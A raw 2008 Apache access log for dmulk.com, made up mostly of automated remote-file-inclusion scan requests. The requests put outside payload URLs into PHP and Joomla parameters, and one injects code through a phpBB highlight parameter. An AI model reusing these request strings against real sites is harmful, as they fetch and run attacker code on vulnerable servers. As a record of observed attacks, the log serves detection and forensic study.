209.250.234.226 - - [06/Jul/2008:10:19:26 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:19:29 -0700] "GET /logs/access_080329.log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:10:19:31 -0700] "GET /logs/access_071223.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.75.152.96 - - [06/Jul/2008:10:19:36 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.fsv-neuberg.de/cms/mambots/rox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.3.74.226 - - [06/Jul/2008:10:19:37 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.larisco.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.116.167.49 - - [06/Jul/2008:10:19:49 -0700] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.dutadewata.com/bot4-id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:20:03 -0700] "GET /logs/atom.php5?page=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:20:08 -0700] "GET /logs/atom.php5?page=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:20:13 -0700] "GET /atom.php5?page=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:20:18 -0700] "GET /atom.php5?page=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:10:20:21 -0700] "GET /logs///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
205.234.240.98 - - [06/Jul/2008:10:20:21 -0700] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:20:25 -0700] "GET /logs/access_080225.log//agendax/addevent.inc.php?agendax_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:20:37 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:20:37 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:20:37 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:20:37 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
88.212.201.26 - - [06/Jul/2008:10:20:48 -0700] "GET /logs/access_080313.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.212.201.26 - - [06/Jul/2008:10:20:48 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.212.201.26 - - [06/Jul/2008:10:20:49 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:20:50 -0700] "GET /logs/index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.181.105.117 - - [06/Jul/2008:10:20:50 -0700] "GET /index2.php?s=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:21:03 -0700] "GET /logs/access.log/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.29.195.59 - - [06/Jul/2008:10:21:03 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 200 3694 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
81.29.195.59 - - [06/Jul/2008:10:21:03 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:21:04 -0700] "GET /index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18491 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:21:05 -0700] "GET /logs/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.35.63.149 - - [06/Jul/2008:10:21:06 -0700] "GET /logs/access_080130.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:21:07 -0700] "GET /logs///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:21:07 -0700] "GET ///codebb/lang_select?phpbb_root_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:21:07 -0700] "GET /logs///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:21:08 -0700] "GET ///components/com_minibb/bb_plugins.php?absolute_path=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:21:08 -0700] "GET /logs/index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:21:16 -0700] "GET /index.php?go1=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 200 18407 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:21:26 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:21:28 -0700] "GET /logs/access_080120.log/administrator/components/com_joomla-visites/core/include/?custompluginfile[]=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:10:21:37 -0700] "GET /logs///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.217.3 - - [06/Jul/2008:10:21:37 -0700] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
220.129.142.127 - - [06/Jul/2008:10:21:44 -0700] "GET /logs/access_080120.log HTTP/1.1" 200 585838 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
67.195.58.182 - - [06/Jul/2008:10:21:51 -0700] "GET /logs/access_080118.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
88.212.201.26 - - [06/Jul/2008:10:22:17 -0700] "GET /logs/access_080329.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.54.71.141 - - [06/Jul/2008:10:22:34 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.geocities.com/jempiak/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:23:13 -0700] "GET /logs/access_080329.log/index.php?option=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:23:16 -0700] "GET /index.php?option=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 200 18381 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.94.74 - - [06/Jul/2008:10:23:17 -0700] "GET /logs/index.php?option=http://l1nuxgroup.by.ru/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:23:29 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:23:30 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:23:33 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18587 "-" "libwww-perl/5.805" "www.dmulk.com"
208.72.56.36 - - [06/Jul/2008:10:23:34 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:23:34 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.30 - - [06/Jul/2008:10:23:36 -0700] "GET /?S=D&show=slide&pageid=17&nggpage=2 HTTP/1.1" 200 34791 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:23:37 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
65.55.211.30 - - [06/Jul/2008:10:23:37 -0700] "GET /logs/access_080526.log HTTP/1.1" 304 - "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:23:39 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:23:40 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:23:40 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.250.234.226 - - [06/Jul/2008:10:23:40 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.141.56.116 - - [06/Jul/2008:10:23:40 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://john-moeller.de/agow/files/rfi-response.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.49.13.112 - - [06/Jul/2008:10:23:44 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=ftp://81.177.8.194/Upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:10:23:45 -0700] "GET /logs//index.php4?lang=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.218.85.18 - - [06/Jul/2008:10:23:46 -0700] "GET //index.php4?lang=http://pemlk.iespana.es/tools/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:10:23:58 -0700] "GET //atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.242.34 - - [06/Jul/2008:10:24:04 -0700] "GET /logs//atom.php5?page=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.234.130.30 - - [06/Jul/2008:10:24:22 -0700] "GET /logs/access_080329.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://geocities.com/anang_kuclux/anang.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.234.130.30 - - [06/Jul/2008:10:24:22 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://geocities.com/anang_kuclux/anang.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
85.234.130.30 - - [06/Jul/2008:10:24:23 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://geocities.com/anang_kuclux/anang.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.806" "www.dmulk.com"
88.212.201.26 - - [06/Jul/2008:10:24:28 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
65.55.109.147 - - [06/Jul/2008:10:24:38 -0700] "GET /?S=D&show=slide&pageid=17&nggpage=2 HTTP/1.0" 200 34775 "http://search.live.com/results.aspx?q=byron&form=QBHP" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "www.dmulk.com"
65.55.109.147 - - [06/Jul/2008:10:24:39 -0700] "GET /blog/wp-content/themes/default/style.css HTTP/1.0" 200 9232 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.147 - - [06/Jul/2008:10:24:39 -0700] "GET /blog/wp-content/plugins/nggallery/css/nggallery.css HTTP/1.0" 200 5241 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.147 - - [06/Jul/2008:10:24:40 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox.css HTTP/1.0" 200 4019 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.147 - - [06/Jul/2008:10:24:40 -0700] "GET /blog/wp-includes/js/jquery/jquery.js?ver=1.2.3 HTTP/1.0" 200 29867 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.147 - - [06/Jul/2008:10:24:40 -0700] "GET /blog/wp-content/plugins/nggallery/thickbox/thickbox-pack.js?ver=3.1.1 HTTP/1.0" 200 8888 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
65.55.109.147 - - [06/Jul/2008:10:24:40 -0700] "GET /blog/wp-content/plugins/nggallery/admin/js/swfobject.js?ver=1.5 HTTP/1.0" 200 6722 "http://www.dmulk.com/?S=D&show=slide&pageid=17&nggpage=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322)" "dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:24:42 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:24:43 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18587 "-" "libwww-perl/5.812" "www.dmulk.com"
70.86.29.178 - - [06/Jul/2008:10:24:44 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:24:45 -0700] "GET /logs///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.208.98.130 - - [06/Jul/2008:10:24:45 -0700] "GET ///phpsecurityadmin/include/logout.php?PSA_PATH=http://dannaoui.com/Mambo/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:24:47 -0700] "GET /logs/index.php?meio=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [06/Jul/2008:10:24:50 -0700] "GET /logs/access.log//index.php?lang=en&page=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [06/Jul/2008:10:24:50 -0700] "GET /index.php?meio=http://servitis-web.com/ftdc/r0x.gif?? HTTP/1.1" 200 18399 "-" "libwww-perl/5.810" "www.dmulk.com"
194.143.183.8 - - [06/Jul/2008:10:24:55 -0700] "GET //index.php?lang=en&page=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 200 18405 "-" "libwww-perl/5.79" "www.dmulk.com"
194.143.183.8 - - [06/Jul/2008:10:24:56 -0700] "GET /logs//index.php?lang=en&page=http://www.idols.m23.ru/id.txtt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:24:56 -0700] "GET /logs/access_080105.log/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:24:57 -0700] "GET /logs/access.log//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:25:00 -0700] "GET /index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18491 "-" "libwww-perl/5.803" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:25:01 -0700] "GET /logs/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:25:03 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18595 "-" "libwww-perl/5.805" "www.dmulk.com"
85.236.38.117 - - [06/Jul/2008:10:25:03 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.164.225.11 - - [06/Jul/2008:10:25:11 -0700] "GET /logs/access_080213.log/index.php?configFile=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:25:11 -0700] "GET //amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:25:11 -0700] "GET ///com_cropimage/admin.cropcanvas.php?cropimagedir=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.165.49.171 - - [06/Jul/2008:10:25:11 -0700] "GET /logs/access.log/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:25:12 -0700] "GET /logs//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://dannaoui.com/Mambo/images/img/test?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:10:25:13 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
194.165.49.171 - - [06/Jul/2008:10:25:14 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 200 18507 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.245.146 - - [06/Jul/2008:10:25:14 -0700] "GET / HTTP/1.0" 200 18241 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.dmulk.com"
194.165.49.171 - - [06/Jul/2008:10:25:15 -0700] "GET /logs/index.php?option=com_virtuemart&Itemid=&mosConfig_absolute_path=http://alaskafamily.net/poll/sistem.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.76.116.20 - - [06/Jul/2008:10:25:19 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.secondhandshop55.de/content//contenido/classes/updates? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
190.139.105.99 - - [06/Jul/2008:10:25:21 -0700] "GET /logs/access_080130.log HTTP/1.0" 200 589824 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.249.0.39 - - [06/Jul/2008:10:25:23 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://c3media.net/images/img/paddy?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.9.60.141 - - [06/Jul/2008:10:25:35 -0700] "GET /logs/access_080117.log/index1.php?=http://www.harvestresources.com/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.34.140.215 - - [06/Jul/2008:10:25:45 -0700] "GET /logs//index.php4?lang=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.34.140.215 - - [06/Jul/2008:10:25:46 -0700] "GET //index.php4?lang=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:26:04 -0700] "GET /logs/access_080212.log/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:26:04 -0700] "GET /logs/access_080212.log/index.php?incl=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:26:05 -0700] "GET /logs/index.php?incl=ftp://81.177.8.194/Upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
69.93.48.162 - - [06/Jul/2008:10:26:05 -0700] "GET /logs/index.php?incl=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
218.50.53.168 - - [06/Jul/2008:10:26:11 -0700] "GET /logs/access_080312.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://senzakiakkiere.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
